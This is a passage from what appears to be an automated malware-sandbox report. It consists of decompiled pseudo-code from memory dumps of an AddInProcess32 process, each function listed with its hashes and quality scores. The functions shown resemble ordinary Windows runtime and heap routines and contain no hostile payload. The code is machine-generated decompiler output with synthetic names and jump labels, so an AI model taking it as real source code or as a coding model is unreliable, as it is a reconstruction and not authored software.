                              								if(_t57 != 0) {
                              									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                              								}
                              							}
                              							_t46 = _t65;
                              							L12:
                              							return E0189B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                              						}
                              						L7:
                              						_t50 = _a4;
                              						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                              						if(_t50 != 3) {
                              							if(_t50 == 2) {
                              								goto L8;
                              							}
                              							L9:
                              							if(E0189F380(_t67 + 0xc, 0x1835138, 0x10) == 0) {
                              								 *0x19460d8 = _t67;
                              							}
                              							goto L10;
                              						}
                              						L8:
                              						_t64 = _t57 + 0x28;
                              						E01884F49(_t67, _t57 + 0x28);
                              						goto L9;
                              					}
                              					_t65 = 0;
                              					goto L7;
                              				}
                              				if(E01884E70(0x19486b0, 0x1885690, 0, 0) != 0) {
                              					_t46 = E0185CCC0(_t56);
                              					goto L12;
                              				} else {
                              					_t59 = 0xa0;
                              					goto L3;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ab13001617830b8b1259fca0c807016f3bb382206bf3e9a2d0215a7f1440b9a9
                              • Instruction ID: 80063e7371fd65d9296ef9728f5b9e49a9af82f221ad9968d0b6b46f602327c1
                              • Opcode Fuzzy Hash: ab13001617830b8b1259fca0c807016f3bb382206bf3e9a2d0215a7f1440b9a9
                              • Instruction Fuzzy Hash: 4E41D572A44319AFEB32EF18CC80F6AB7A9EB54724F0400A9E945D7281D774DF44CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0191AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                              				intOrPtr _v8;
                              				char _v12;
                              				signed int _v16;
                              				signed char _v20;
                              				intOrPtr _v24;
                              				char* _t37;
                              				void* _t47;
                              				signed char _t51;
                              				void* _t53;
                              				char _t55;
                              				intOrPtr _t57;
                              				signed char _t61;
                              				intOrPtr _t75;
                              				void* _t76;
                              				signed int _t81;
                              				intOrPtr _t82;
                              
                              				_t53 = __ecx;
                              				_t55 = 0;
                              				_v20 = _v20 & 0;
                              				_t75 = __edx;
                              				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                              				_v24 = __edx;
                              				_v12 = 0;
                              				if((_t81 & 0x01000000) != 0) {
                              					L5:
                              					if(_a8 != 0) {
                              						_t81 = _t81 | 0x00000008;
                              					}
                              					_t57 = E0191ABF4(_t55 + _t75, _t81);
                              					_v8 = _t57;
                              					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                              						_t76 = 0;
                              						_v16 = _v16 & 0;
                              					} else {
                              						_t59 = _t53;
                              						_t76 = E0191AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                              						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                              							_t47 = E0191AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                              							_t61 = _v20;
                              							if(_t61 != 0) {
                              								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                              								if(E018FCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                              									L018777F0(_t53, 0, _t76);
                              									_t76 = 0;
                              								}
                              							}
                              						}
                              					}
                              					_t82 = _v8;
                              					L16:
                              					if(E01877D50() == 0) {
                              						_t37 = 0x7ffe0380;
                              					} else {
                              						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              					}
                              					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                              						E0191131B(_t53, _t76, _t82, _v16);
                              					}
                              					return _t76;
                              				}
                              				_t51 =  *(__ecx + 0x20);
                              				_v20 = _t51;
                              				if(_t51 == 0) {
                              					goto L5;
                              				}
                              				_t81 = _t81 | 0x00000008;
                              				if(E018FCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                              					_t55 = _v12;
                              					goto L5;
                              				} else {
                              					_t82 = 0;
                              					_t76 = 0;
                              					_v16 = _v16 & 0;
                              					goto L16;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                              • Instruction ID: eb2af7908497f7b283ffeef41fe49dce4484fde6b124df41040c551126a31e8b
                              • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                              • Instruction Fuzzy Hash: C8313632F021CD6BEB158B69CC44BAFFBBBEF80211F054469E909E7255DA34CE80C650
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E01868A0A(intOrPtr* __ecx, signed int __edx) {
                              				signed int _v8;
                              				char _v524;
                              				signed int _v528;
                              				void* _v532;
                              				char _v536;
                              				char _v540;
                              				char _v544;
                              				intOrPtr* _v548;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t44;
                              				void* _t46;
                              				void* _t48;
                              				signed int _t53;
                              				signed int _t55;
                              				intOrPtr* _t62;
                              				void* _t63;
                              				unsigned int _t75;
                              				signed int _t79;
                              				unsigned int _t81;
                              				unsigned int _t83;
                              				signed int _t84;
                              				void* _t87;
                              
                              				_t76 = __edx;
                              				_v8 =  *0x194d360 ^ _t84;
                              				_v536 = 0x200;
                              				_t79 = 0;
                              				_v548 = __edx;
                              				_v544 = 0;
                              				_t62 = __ecx;
                              				_v540 = 0;
                              				_v532 =  &_v524;
                              				if(__edx == 0 || __ecx == 0) {
                              					L6:
                              					return E0189B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                              				} else {
                              					_v528 = 0;
                              					E0186E9C0(1, __ecx, 0, 0,  &_v528);
                              					_t44 = _v528;
                              					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                              					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                              					_t46 = 0xa;
                              					_t87 = _t81 - _t46;
                              					if(_t87 > 0 || _t87 == 0) {
                              						 *_v548 = 0x1831180;
                              						L5:
                              						_t79 = 1;
                              						goto L6;
                              					} else {
                              						_t48 = E01881DB5(_t62,  &_v532,  &_v536);
                              						_t76 = _v528;
                              						if(_t48 == 0) {
                              							L9:
                              							E01893C2A(_t81, _t76,  &_v544);
                              							 *_v548 = _v544;
                              							goto L5;
                              						}
                              						_t62 = _v532;
                              						if(_t62 != 0) {
                              							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                              							_t53 =  *_t62;
                              							_v528 = _t53;
                              							if(_t53 != 0) {
                              								_t63 = _t62 + 4;
                              								_t55 = _v528;
                              								do {
                              									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                              										if(E01868999(_t63,  &_v540) == 0) {
                              											_t55 = _v528;
                              										} else {
                              											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                              											_t55 = _v528;
                              											if(_t75 >= _t83) {
                              												_t83 = _t75;
                              											}
                              										}
                              									}
                              									_t63 = _t63 + 0x14;
                              									_t55 = _t55 - 1;
                              									_v528 = _t55;
                              								} while (_t55 != 0);
                              								_t62 = _v532;
                              							}
                              							if(_t62 !=  &_v524) {
                              								L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                              							}
                              							_t76 = _t83 & 0x0000ffff;
                              							_t81 = _t83 >> 0x10;
                              						}
                              						goto L9;
                              					}
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b6fdd5a4f99520bb3ef85455ecb0584e6e12fada1e0a6d03e9a52454bbd2c55a
                              • Instruction ID: 5ae1cc4709ab34fb393d3c9405a9439d331eed5ac6c6fbac08869d5ea7172ec4
                              • Opcode Fuzzy Hash: b6fdd5a4f99520bb3ef85455ecb0584e6e12fada1e0a6d03e9a52454bbd2c55a
                              • Instruction Fuzzy Hash: B4417EB4A0032D9BDB24DF19C888AA9B7F8EB55304F1041EAD91DD7242EB709F80CF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E0191FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                              				char _v8;
                              				signed int _v12;
                              				signed int _t29;
                              				char* _t32;
                              				char* _t43;
                              				signed int _t80;
                              				signed int* _t84;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t56 = __edx;
                              				_t84 = __ecx;
                              				_t80 = E0191FD4E(__ecx, __edx);
                              				_v12 = _t80;
                              				if(_t80 != 0) {
                              					_t29 =  *__ecx & _t80;
                              					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                              					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                              						E01920A13(__ecx, _t80, 0, _a4);
                              						_t80 = 1;
                              						if(E01877D50() == 0) {
                              							_t32 = 0x7ffe0380;
                              						} else {
                              							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              						}
                              						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                              							_push(3);
                              							L21:
                              							E01911608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                              						}
                              						goto L22;
                              					}
                              					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                              						_t80 = E01922B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                              						if(_t80 != 0) {
                              							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                              							_t77 = _v8;
                              							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                              								E0191C8F7(_t66, _t77, 0);
                              							}
                              						}
                              					} else {
                              						_t80 = E0191DBD2(__ecx[0xb], _t74, __edx, _a4);
                              					}
                              					if(E01877D50() == 0) {
                              						_t43 = 0x7ffe0380;
                              					} else {
                              						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              					}
                              					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                              						goto L22;
                              					} else {
                              						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                              						goto L21;
                              					}
                              				} else {
                              					_push(__ecx);
                              					_push(_t80);
                              					E0191A80D(__ecx[0xf], 9, __edx, _t80);
                              					L22:
                              					return _t80;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                              • Instruction ID: 3843f7daf554163910e8c479623e163b9a053a5416780f126261ea0b9011ff3f
                              • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                              • Instruction Fuzzy Hash: 3431283220064C6FD722876CC848F6A7BAAEBC5750F084558E54E8B34ADA70EC85C750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 70%
                              			E0191EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                              				signed int _v8;
                              				char _v12;
                              				intOrPtr _v15;
                              				char _v16;
                              				intOrPtr _v19;
                              				void* _v28;
                              				intOrPtr _v36;
                              				void* __ebx;
                              				void* __edi;
                              				signed char _t26;
                              				signed int _t27;
                              				char* _t40;
                              				unsigned int* _t50;
                              				intOrPtr* _t58;
                              				unsigned int _t59;
                              				char _t75;
                              				signed int _t86;
                              				intOrPtr _t88;
                              				intOrPtr* _t91;
                              
                              				_t75 = __edx;
                              				_t91 = __ecx;
                              				_v12 = __edx;
                              				_t50 = __ecx + 0x30;
                              				_t86 = _a4 & 0x00000001;
                              				if(_t86 == 0) {
                              					E01872280(_t26, _t50);
                              					_t75 = _v16;
                              				}
                              				_t58 = _t91;
                              				_t27 = E0191E815(_t58, _t75);
                              				_v8 = _t27;
                              				if(_t27 != 0) {
                              					E0185F900(_t91 + 0x34, _t27);
                              					if(_t86 == 0) {
                              						E0186FFB0(_t50, _t86, _t50);
                              					}
                              					_push( *((intOrPtr*)(_t91 + 4)));
                              					_push( *_t91);
                              					_t59 =  *(_v8 + 0x10);
                              					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                              					_push(0x8000);
                              					_t11 = _t53 - 1; // 0x0
                              					_t12 = _t53 - 1; // 0x0
                              					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                              					E0191AFDE( &_v12,  &_v16);
                              					asm("lock xadd [eax], ecx");
                              					asm("lock xadd [eax], ecx");
                              					E0191BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                              					_t55 = _v36;
                              					_t88 = _v36;
                              					if(E01877D50() == 0) {
                              						_t40 = 0x7ffe0388;
                              					} else {
                              						_t55 = _v19;
                              						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              					}
                              					if( *_t40 != 0) {
                              						E0190FE3F(_t55, _t91, _v15, _t55);
                              					}
                              				} else {
                              					if(_t86 == 0) {
                              						E0186FFB0(_t50, _t86, _t50);
                              						_t75 = _v16;
                              					}
                              					_push(_t58);
                              					_t88 = 0;
                              					_push(0);
                              					E0191A80D(_t91, 8, _t75, 0);
                              				}
                              				return _t88;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                              • Instruction ID: 8ae8923820c5c5cba8673b3827df12280fa6f71336521f72c104e6654ed3627b
                              • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                              • Instruction Fuzzy Hash: C531B47260470A9BC71ADF28C880A5BB7AAFFC4310F04492DF95A87785DE30E945C7A5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 69%
                              			E018D69A6(signed short* __ecx, void* __eflags) {
                              				signed int _v8;
                              				signed int _v16;
                              				intOrPtr _v20;
                              				signed int _v24;
                              				signed short _v28;
                              				signed int _v32;
                              				intOrPtr _v36;
                              				signed int _v40;
                              				char* _v44;
                              				signed int _v48;
                              				intOrPtr _v52;
                              				signed int _v56;
                              				char _v60;
                              				signed int _v64;
                              				char _v68;
                              				char _v72;
                              				signed short* _v76;
                              				signed int _v80;
                              				char _v84;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t68;
                              				intOrPtr _t73;
                              				signed short* _t74;
                              				void* _t77;
                              				void* _t78;
                              				signed int _t79;
                              				signed int _t80;
                              
                              				_v8 =  *0x194d360 ^ _t80;
                              				_t75 = 0x100;
                              				_v64 = _v64 & 0x00000000;
                              				_v76 = __ecx;
                              				_t79 = 0;
                              				_t68 = 0;
                              				_v72 = 1;
                              				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                              				_t77 = 0;
                              				if(L01866C59(__ecx[2], 0x100, __eflags) != 0) {
                              					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                              					if(_t79 != 0 && E018D6BA3() != 0) {
                              						_push(0);
                              						_push(0);
                              						_push(0);
                              						_push(0x1f0003);
                              						_push( &_v64);
                              						if(E01899980() >= 0) {
                              							E01872280(_t56, 0x1948778);
                              							_t77 = 1;
                              							_t68 = 1;
                              							if( *0x1948774 == 0) {
                              								asm("cdq");
                              								 *(_t79 + 0xf70) = _v64;
                              								 *(_t79 + 0xf74) = 0x100;
                              								_t75 = 0;
                              								_t73 = 4;
                              								_v60 =  &_v68;
                              								_v52 = _t73;
                              								_v36 = _t73;
                              								_t74 = _v76;
                              								_v44 =  &_v72;
                              								 *0x1948774 = 1;
                              								_v56 = 0;
                              								_v28 = _t74[2];
                              								_v48 = 0;
                              								_v20 = ( *_t74 & 0x0000ffff) + 2;
                              								_v40 = 0;
                              								_v32 = 0;
                              								_v24 = 0;
                              								_v16 = 0;
                              								if(E0185B6F0(0x183c338, 0x183c288, 3,  &_v60) == 0) {
                              									_v80 = _v80 | 0xffffffff;
                              									_push( &_v84);
                              									_push(0);
                              									_push(_v64);
                              									_v84 = 0xfa0a1f00;
                              									E01899520();
                              								}
                              							}
                              						}
                              					}
                              				}
                              				if(_v64 != 0) {
                              					_push(_v64);
                              					E018995D0();
                              					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                              					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                              				}
                              				if(_t77 != 0) {
                              					E0186FFB0(_t68, _t77, 0x1948778);
                              				}
                              				_pop(_t78);
                              				return E0189B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 62da94347473a41523ab086ff7feac7cf9c577f79a72081c6ff329abb94dd061
                              • Instruction ID: 42857088606c05e67f9f633958953994c7c47fe765df76f7726031158853a886
                              • Opcode Fuzzy Hash: 62da94347473a41523ab086ff7feac7cf9c577f79a72081c6ff329abb94dd061
                              • Instruction Fuzzy Hash: 78415CB5D003099FDB24DFAAD940BAEBBF8EF48714F14812AE954E7240EB749A05CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E01855210(intOrPtr _a4, void* _a8) {
                              				void* __ecx;
                              				intOrPtr _t31;
                              				signed int _t32;
                              				signed int _t33;
                              				intOrPtr _t35;
                              				signed int _t52;
                              				void* _t54;
                              				void* _t56;
                              				unsigned int _t59;
                              				signed int _t60;
                              				void* _t61;
                              
                              				_t61 = E018552A5(1);
                              				if(_t61 == 0) {
                              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                              					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                              					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                              				} else {
                              					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                              					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                              				}
                              				_t60 = _t59 >> 1;
                              				_t32 = 0x3a;
                              				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                              					_t52 = _t60 + _t60;
                              					if(_a4 > _t52) {
                              						goto L5;
                              					}
                              					if(_t61 != 0) {
                              						asm("lock xadd [esi], eax");
                              						if((_t32 | 0xffffffff) == 0) {
                              							_push( *((intOrPtr*)(_t61 + 4)));
                              							E018995D0();
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                              						}
                              					} else {
                              						E0186EB70(_t54, 0x19479a0);
                              					}
                              					_t26 = _t52 + 2; // 0xddeeddf0
                              					return _t26;
                              				} else {
                              					_t52 = _t60 + _t60;
                              					if(_a4 < _t52) {
                              						if(_t61 != 0) {
                              							asm("lock xadd [esi], eax");
                              							if((_t32 | 0xffffffff) == 0) {
                              								_push( *((intOrPtr*)(_t61 + 4)));
                              								E018995D0();
                              								L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                              							}
                              						} else {
                              							E0186EB70(_t54, 0x19479a0);
                              						}
                              						return _t52;
                              					}
                              					L5:
                              					_t33 = E0189F3E0(_a8, _t54, _t52);
                              					if(_t61 == 0) {
                              						E0186EB70(_t54, 0x19479a0);
                              					} else {
                              						asm("lock xadd [esi], eax");
                              						if((_t33 | 0xffffffff) == 0) {
                              							_push( *((intOrPtr*)(_t61 + 4)));
                              							E018995D0();
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                              						}
                              					}
                              					_t35 = _a8;
                              					if(_t60 <= 1) {
                              						L9:
                              						_t60 = _t60 - 1;
                              						 *((short*)(_t52 + _t35 - 2)) = 0;
                              						goto L10;
                              					} else {
                              						_t56 = 0x3a;
                              						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                              							 *((short*)(_t52 + _t35)) = 0;
                              							L10:
                              							return _t60 + _t60;
                              						}
                              						goto L9;
                              					}
                              				}
                              			}


                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4682b9382d7ed1a302b9976a7017b2fcbe6b341d86aa7364f7ca85c6f38967f9
                              • Instruction ID: 14f046c10718c15de863755abacc28d207d2c42ef6b4aef3b092462deacf688d
                              • Opcode Fuzzy Hash: 4682b9382d7ed1a302b9976a7017b2fcbe6b341d86aa7364f7ca85c6f38967f9
                              • Instruction Fuzzy Hash: 9C31F231641605ABCB269B1CC880BAB7BB5EF107A4F194719F959CB6E0EB60FB00C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E01893D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                              				intOrPtr _v8;
                              				char _v12;
                              				signed short** _t33;
                              				short* _t38;
                              				intOrPtr* _t39;
                              				intOrPtr* _t41;
                              				signed short _t43;
                              				intOrPtr* _t47;
                              				intOrPtr* _t53;
                              				signed short _t57;
                              				intOrPtr _t58;
                              				signed short _t60;
                              				signed short* _t61;
                              
                              				_t47 = __ecx;
                              				_t61 = __edx;
                              				_t60 = ( *__ecx & 0x0000ffff) + 2;
                              				if(_t60 > 0xfffe) {
                              					L22:
                              					return 0xc0000106;
                              				}
                              				if(__edx != 0) {
                              					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                              						L5:
                              						E01867B60(0, _t61, 0x18311c4);
                              						_v12 =  *_t47;
                              						_v12 = _v12 + 0xfff8;
                              						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                              						E01867B60(0xfff8, _t61,  &_v12);
                              						_t33 = _a8;
                              						if(_t33 != 0) {
                              							 *_t33 = _t61;
                              						}
                              						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                              						_t53 = _a12;
                              						if(_t53 != 0) {
                              							_t57 = _t61[2];
                              							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                              							while(_t38 >= _t57) {
                              								if( *_t38 == 0x5c) {
                              									_t41 = _t38 + 2;
                              									if(_t41 == 0) {
                              										break;
                              									}
                              									_t58 = 0;
                              									if( *_t41 == 0) {
                              										L19:
                              										 *_t53 = _t58;
                              										goto L7;
                              									}
                              									 *_t53 = _t41;
                              									goto L7;
                              								}
                              								_t38 = _t38 - 2;
                              							}
                              							_t58 = 0;
                              							goto L19;
                              						} else {
                              							L7:
                              							_t39 = _a16;
                              							if(_t39 != 0) {
                              								 *_t39 = 0;
                              								 *((intOrPtr*)(_t39 + 4)) = 0;
                              								 *((intOrPtr*)(_t39 + 8)) = 0;
                              								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                              							}
                              							return 0;
                              						}
                              					}
                              					_t61 = _a4;
                              					if(_t61 != 0) {
                              						L3:
                              						_t43 = L01874620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                              						_t61[2] = _t43;
                              						if(_t43 == 0) {
                              							return 0xc0000017;
                              						}
                              						_t61[1] = _t60;
                              						 *_t61 = 0;
                              						goto L5;
                              					}
                              					goto L22;
                              				}
                              				_t61 = _a4;
                              				if(_t61 == 0) {
                              					return 0xc000000d;
                              				}
                              				goto L3;
                              			}


                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a6783fd8d2e418e2c2d97c3aa403f8195f9e46738e2a21a3c1e0e61032dc14d9
                              • Instruction ID: e615db68f0c7949daecbdfd2bcd84ae22bc56eb6bb8ecb393dbe6dd2fdf7976e
                              • Opcode Fuzzy Hash: a6783fd8d2e418e2c2d97c3aa403f8195f9e46738e2a21a3c1e0e61032dc14d9
                              • Instruction Fuzzy Hash: 3231AB31A05615DBDB258F3DC851A6ABBE5FF85B10B09806EE94ACB750E730DA40C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 78%
                              			E0188A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                              				intOrPtr _t35;
                              				intOrPtr _t39;
                              				intOrPtr _t45;
                              				intOrPtr* _t51;
                              				intOrPtr* _t52;
                              				intOrPtr* _t55;
                              				signed int _t57;
                              				intOrPtr* _t59;
                              				intOrPtr _t68;
                              				intOrPtr* _t77;
                              				void* _t79;
                              				signed int _t80;
                              				intOrPtr _t81;
                              				char* _t82;
                              				void* _t83;
                              
                              				_push(0x24);
                              				_push(0x1930220);
                              				E018AD08C(__ebx, __edi, __esi);
                              				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                              				_t79 = __ecx;
                              				_t35 =  *0x1947b9c; // 0x0
                              				_t55 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                              				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                              				if(_t55 == 0) {
                              					_t39 = 0xc0000017;
                              					L11:
                              					return E018AD0D1(_t39);
                              				}
                              				_t68 = 0;
                              				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                              				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                              				_t7 = _t55 + 8; // 0x8
                              				_t57 = 6;
                              				memcpy(_t7, _t79, _t57 << 2);
                              				_t80 = 0xfffffffe;
                              				 *(_t83 - 4) = _t80;
                              				if(0 < 0) {
                              					L14:
                              					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                              					L20:
                              					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                              					_t39 = _t81;
                              					goto L11;
                              				}
                              				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                              					_t81 = 0xc000007b;
                              					goto L20;
                              				}
                              				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                              					_t59 =  *((intOrPtr*)(_t83 + 8));
                              					_t45 =  *_t59;
                              					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
